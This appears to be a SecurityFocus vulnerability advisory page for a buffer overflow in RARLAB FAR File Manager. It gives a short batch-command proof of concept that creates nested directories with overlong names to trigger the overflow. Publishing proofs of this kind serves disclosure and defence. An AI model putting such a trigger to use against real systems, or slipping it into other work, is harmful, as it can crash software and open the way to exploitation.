info
discussion
exploit
solution
references
RARLAB FAR File Manager Buffer Overflow Vulnerability
The following proof of concept was provided:
SET A=A<260 chars>A
SET B=BBBBBBBBBBBBBBBB
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%B%\
Privacy Statement
Copyright 2010, SecurityFocus